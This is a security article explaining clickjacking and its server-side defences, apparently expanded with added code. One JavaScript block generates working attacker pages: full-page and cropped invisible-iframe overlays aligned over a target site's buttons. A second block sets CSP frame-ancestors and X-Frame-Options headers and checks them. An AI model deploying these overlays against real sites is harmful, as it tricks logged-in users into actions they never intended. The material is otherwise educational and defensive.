Clickjacking attacks: How innocent clicks compromise your privacy
Clickjacking is one of the techniques cybercriminals use. In this case, scammers abuse legitimate, trusted websites, loading them invisibly inside a page they control, so that the victim's own clicks are turned against them.
26 July 2024 20:18
Innocently clicking "Like" or subscribing to a newsletter on a rigged page can trigger a completely different action on a trusted site where you are already logged in: following an account, granting a permission, changing a setting, approving a request, or, combined with other tricks, confirming a download of harmful software. The technique, known as clickjacking, works by placing a legitimate website invisibly over what the user actually sees, so a click intended for one thing lands on another.
What is clickjacking and what makes it powerful?
Imagine being handed an innocuous-looking sheet to sign, say a petition or a raffle entry. Underneath it, hidden from view, lies a real document, such as a bank authorization, and between the two sits a sheet of carbon paper. The signature you put on the harmless top sheet is pressed through onto the document below. You signed exactly what you thought you were signing, yet the scammer walks away with your signature on something else entirely.
Clickjacking works the same way. The attacker builds a web page that loads a legitimate, trusted site (typically one the victim is already logged in to) inside an invisible frame and lines it up with decoy content. The victim clicks what looks like a harmless link, button or form on the attacker's page, and the click actually lands on a real control of the trusted site, performing an action the victim never intended.
Attackers have several ways of laying out such a page. The most basic is to stretch a fully transparent frame of the target site across the whole page. This is trivial to build, but it is also the easiest to stop: a target site that instructs browsers not to render it inside frames (through the X-Frame-Options or Content-Security-Policy frame-ancestors response headers) defeats it outright, and a decoy page that must be clickable everywhere is hard to keep convincing.
More refined variants therefore crop the frame so that only a single control of the target site is exposed, such as a "Like" or "Follow" button or the "Allow" button of a permissions dialog, positioned precisely beneath a decoy element like a fake social-media post. A click on the decoy registers on the real button: the victim likes or follows something they never saw, or grants a permission (the classic demonstration switched on a webcam through a browser plugin's settings dialog). A related trick is a fake login form layered over a trusted page; whatever is typed into it goes straight to the criminals' database, to be used or resold. Strictly speaking that is phishing rather than clickjacking, but the two are often combined.
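The two layouts described above, the full-page transparent frame and the cropped single-button frame, as an added example that is not part of the original article. The functions emit the attacker's page so the geometry of the trick is visible; every URL, label and coordinate is a constructed placeholder, not a real target.

```javascript
// Added example, not from the article: the two overlay layouts described
// above, written as functions that emit the attacker's page. Every URL, label
// and coordinate is a constructed placeholder, not a real target.

// Full-page overlay: a frame of the trusted site covers the whole window at
// opacity 0, stacked above the decoy, so every click lands on the framed page.
function fullPageOverlay(targetUrl, decoyHtml) {
  return [
    '<!doctype html><body style="margin:0">',
    `<div>${decoyHtml}</div>`,
    `<iframe src="${targetUrl}" style="position:absolute;top:0;left:0;` +
      'width:100vw;height:100vh;border:0;opacity:0;z-index:2"></iframe>',
    '</body>',
  ].join('\n');
}

// Cropped overlay: only a button-sized window onto the target is exposed.
// `button` gives the real control's position and size on the target page and
// the page width the target lays itself out at. The frame is shifted by
// negative offsets so that control sits exactly under the decoy button, and
// overflow:hidden clips everything else. A near-zero opacity keeps the frame
// invisible while it still receives the click.
function croppedOverlay(targetUrl, button, decoyLabel) {
  const { x, y, w, h, pageWidth } = button;
  return [
    '<!doctype html><body>',
    `<div style="position:relative;width:${w}px;height:${h}px;overflow:hidden">`,
    `<button style="position:absolute;top:0;left:0;width:${w}px;height:${h}px;z-index:1">${decoyLabel}</button>`,
    `<iframe src="${targetUrl}" scrolling="no" style="position:absolute;` +
      `top:-${y}px;left:-${x}px;width:${pageWidth}px;height:${y + h}px;` +
      'border:0;opacity:0.001;z-index:2"></iframe>',
    '</div></body>',
  ].join('\n');
}

// Reads the frame offset back out of a generated page, so a reviewer (or a
// test) can confirm the frame was aligned to the intended target control.
function frameOffset(html) {
  const m = html.match(/top:-(\d+)px;left:-(\d+)px/);
  return m ? { x: Number(m[2]), y: Number(m[1]) } : null;
}
```

The only thing that makes either page work is that the browser agrees to load the target inside the iframe at all; the cropping and alignment are cosmetic. That is why the defence lives on the target site's server rather than on the victim's machine.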
Such attacks are hard to spot. The victim sees a perfectly ordinary page, the trusted site is never visibly loaded, and nothing about the click looks wrong. The average internet user has only limited means of detecting them (although some warning signs exist), and putting proper protection in place on a website usually requires developers who know the relevant browser mechanisms.
“Due to the hidden nature of these activities, victims cannot see the danger. However, certain symptoms can raise the suspicions of an aware internet user. For example, if, after clicking a consent window for data processing, there is a noticeable, quick change of content, or the site does not respond to clicks, this could indicate an attempt at fraud. If a red warning light goes off in the user's head in such a situation or a similar one, it is worth reporting it to the website administrator, who can take appropriate steps to verify the case and, if necessary, restore the site's security,” advises Robert Dąbrowski, head of the engineering team at Fortinet's Polish branch.
How to protect against danger?
Responsibility for protecting against clickjacking lies primarily with website owners. The most effective defence is for the development team to have the server tell browsers where, if anywhere, the site may be embedded: the Content-Security-Policy response header's frame-ancestors directive, with X-Frame-Options as a fallback for older browsers. A browser that receives these headers refuses to render the page inside a frame on any other site, so there is nothing for the attacker's transparent layer to load.
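The server-side protection described above, as an added example that is not part of the original article. It builds the two headers, applies them in a plain Node.js request handler (no framework assumed), and includes a simplified model of the decision a browser makes from those headers so a deployment can be checked offline. The origins used are constructed placeholders.

```javascript
// Added example, not from the article: framing protection headers and a
// simplified model of how a browser evaluates them. All origins are placeholders.

// Headers the server should send. CSP frame-ancestors is the modern control;
// X-Frame-Options is kept for older browsers. The default forbids framing
// entirely; pass e.g. ["'self'", "https://portal.example"] to allow embedders.
function frameProtectionHeaders(allowedAncestors = ["'none'"]) {
  const headers = {
    'Content-Security-Policy': `frame-ancestors ${allowedAncestors.join(' ')}`,
  };
  // X-Frame-Options can only express DENY or SAMEORIGIN; for an allow-list it
  // is omitted and the CSP directive carries the policy on its own.
  if (allowedAncestors.length === 1 && allowedAncestors[0] === "'none'") {
    headers['X-Frame-Options'] = 'DENY';
  } else if (allowedAncestors.length === 1 && allowedAncestors[0] === "'self'") {
    headers['X-Frame-Options'] = 'SAMEORIGIN';
  }
  return headers;
}

// Applying the headers in a plain Node http handler. The response body is a
// stand-in for a sensitive page.
function securedHandler(req, res) {
  for (const [k, v] of Object.entries(frameProtectionHeaders(["'self'"]))) {
    res.setHeader(k, v);
  }
  res.setHeader('Content-Type', 'text/html; charset=utf-8');
  res.end('<button id="confirm">Confirm transfer</button>');
}

// Simplified browser decision: if a frame-ancestors directive is present it
// wins; otherwise X-Frame-Options DENY/SAMEORIGIN applies; anything else
// (including a missing header or the obsolete ALLOW-FROM form) is treated as
// no protection. Source matching is exact-origin only; CSP host wildcards and
// scheme-only sources are not modelled here.
function canBeFramed(headers, pageOrigin, embedderOrigin) {
  const lower = {};
  for (const [k, v] of Object.entries(headers)) lower[k.toLowerCase()] = String(v);
  const csp = lower['content-security-policy'];
  if (csp) {
    const directive = csp.split(';').map((s) => s.trim()).find((s) => s.startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1);
      return sources.some((src) => {
        if (src === "'none'") return false;
        if (src === "'self'") return embedderOrigin === pageOrigin;
        if (src === '*') return true;
        return src === embedderOrigin;
      });
    }
  }
  const xfo = (lower['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return embedderOrigin === pageOrigin;
  return true;
}
```

A quick way to audit a live site is to fetch its login or settings page and run the response headers through canBeFramed with an unrelated origin as the embedder; a result of true means the page is a clickjacking candidate and the headers need adding.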
Companies can take further steps to protect their employees and customers. Staff training is crucial: employees who recognise the warning signs react faster and alert the right specialists. Another important measure is a next-generation firewall (NGFW) with a web application firewall function. Such a firewall protects against common network threats and can recognise and block emerging ones, including clickjacking.
Users' computers should always run up-to-date protective software that scans the web pages being opened. Keeping the operating system and, above all, the web browser updated is just as important: several clickjacking methods used in the past have been shut down by protections built into modern browsers, and an outdated browser may not honour them.
Because the way content is presented on the web keeps evolving, attacks like clickjacking will keep appearing, and victims will be lured into performing unexpected actions on pages that look identical to ones they have used before. Awareness efforts, so that suspicious situations are reported quickly to administrators, should therefore continue, alongside the technical measures that reduce the threat at its source.